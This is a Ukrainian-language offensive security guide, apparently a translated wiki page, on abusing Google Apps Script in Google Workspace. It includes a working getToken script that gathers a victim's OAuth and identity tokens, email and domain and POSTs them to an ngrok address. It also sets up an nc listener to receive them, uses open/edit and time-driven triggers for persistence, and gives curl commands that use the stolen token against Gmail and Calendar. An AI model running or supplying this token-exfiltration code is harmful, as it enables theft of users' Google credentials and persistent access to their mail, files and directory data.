GWS - App Scripts

Сценарії додатків

Додаткові скрипти - це код, який буде запущений, коли користувач з дозволом редактора отримає доступ до документу, з яким пов'язаний додатковий скрипт, і після прийняття запиту OAuth. Їх також можна налаштувати на виконання через певний час власником додаткового скрипту (Стійкість).

Створення додаткового скрипту

Є кілька способів створення додаткового скрипту, хоча найпоширеніші - з Google Document (будь-якого типу) та як самостійний проект:

Сценарій додаткового скрипту

Створення Google Sheet з додатковим скриптом

Почніть з створення додаткового скрипту, моя рекомендація для цього сценарію - створити Google Sheet та перейти до Extensions > App Scripts, це відкриє новий додатковий скрипт, пов'язаний з аркушем.

Витік токену

Для надання доступу до токену OAuth вам потрібно клацнути на Services + та додати області видимості, такі як:

• AdminDirectory: Доступ до користувачів та груп каталогу (якщо у користувача достатньо дозволів)

• Gmail: Для доступу до даних Gmail

• Drive: Для доступу до даних Drive

• Google Sheets API: Для роботи з тригером

Щоб змінити необхідні області видимості, ви можете перейти до налаштувань проекту та увімкнути: Show "appsscript.json" manifest file in editor.

function getToken() {
var userEmail = Session.getActiveUser().getEmail();
var domain = userEmail.substring(userEmail.lastIndexOf("@") + 1);
var oauthToken = ScriptApp.getOAuthToken();
var identityToken = ScriptApp.getIdentityToken();

// Data json
data = {
"oauthToken": oauthToken,
"identityToken": identityToken,
"email": userEmail,
"domain": domain
}

// Send data
makePostRequest(data);

// Use the APIs, if you don't even if the have configured them in appscript.json the App script won't ask for permissions

// To ask for AdminDirectory permissions
var pageToken = "";
page = AdminDirectory.Users.list({
domain: domain,  // Use the extracted domain
orderBy: 'givenName',
maxResults: 100,
pageToken: pageToken
});

// To ask for gmail permissions
var threads = GmailApp.getInboxThreads(0, 10);

// To ask for drive permissions
var files = DriveApp.getFiles();
}


function makePostRequest(data) {
var url = 'http://5.tcp.eu.ngrok.io:12027';

var options = {
'method' : 'post',
'contentType': 'application/json',
'payload' : JSON.stringify(data)
};

try {
UrlFetchApp.fetch(url, options);
} catch (e) {
Logger.log("Error making POST request: " + e.toString());
}
}

Для захоплення запиту ви можете просто запустити:

ngrok tcp 4444
nc -lv 4444 #macOS

Дозволи, запитані для виконання App Script:

Створення Тригера

Після того, як App прочитано, клацніть на ⏰ Тригери, щоб створити тригер. Як функцію для виконання виберіть getToken, запускається при розгортанні Head, у джерелі подій виберіть З таблиці і тип події виберіть При відкритті або При редагуванні (залежно від ваших потреб) та збережіть.

Зверніть увагу, що ви можете перевірити виконання App Scripts во вкладці Виконання, якщо ви хочете відлагодити щось.

Поділ

Для запуску App Script потрібно, щоб жертва підключилася з доступом Редактора.

Зловживання документами, які були спільно використані зі мною

Копіювання замість спільного використання

Коли ви створюєте посилання для спільного використання документа, створюється посилання, схоже на це: https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit Якщо ви зміните закінчення "/edit" на "/copy", замість доступу google запитає вас, чи хочете ви створити копію документа:

Якщо користувач скопіює його та отримає доступ, вміст документа та App Scripts будуть скопійовані, проте тригери ні. Тому нічого не буде виконано.

Спільне використання як веб-додаток

Зверніть увагу, що також можливо спільно використовувати App Script як веб-додаток (у Редакторі App Script, розгорнути як веб-додаток), але з'явиться сповіщення, подібне до цього:

За ним слідує типовий запит OAuth, який попросить необхідні дозволи.

Тестування

Ви можете протестувати зібраний токен, щоб перелічити електронні листи за допомогою:

curl -X GET "https://www.googleapis.com/gmail/v1/users/<user@email>/messages" \
-H "Authorization: Bearer <token>"

Список календаря користувача:

curl -H "Authorization: Bearer $OAUTH_TOKEN" \
-H "Accept: application/json" \
"https://www.googleapis.com/calendar/v3/users/me/calendarList"

Скрипт додатка як постійність

Одним з варіантів для постійності буде створення документа та додавання тригера для функції getToken і поділитися документом з зловмисником, щоб кожного разу, коли зловмисник відкриває файл, він ексфільтрує токен жертви.

Також можливо створити скрипт додатка і встановити тригер на виконання кожні X часу (наприклад, кожну хвилину, годину, день...). Зловмисник, який отримав доступ до облікових даних або сесії жертви, може встановити тригер часу для скрипта додатка та витікати дуже привілейований OAuth токен щодня:

Просто створіть скрипт додатка, перейдіть до Тригерів, натисніть на Додати тригер та виберіть як джерело події Time-driven та виберіть опції, які найкраще підходять вам:

Обхід непідтвердженого запиту на спільний документ

Більше того, якщо хтось поділився з вами документом з доступом редактора, ви можете створити скрипти додатків всередині документа, а ВЛАСНИК (створювач) документа буде власником скрипта додатка.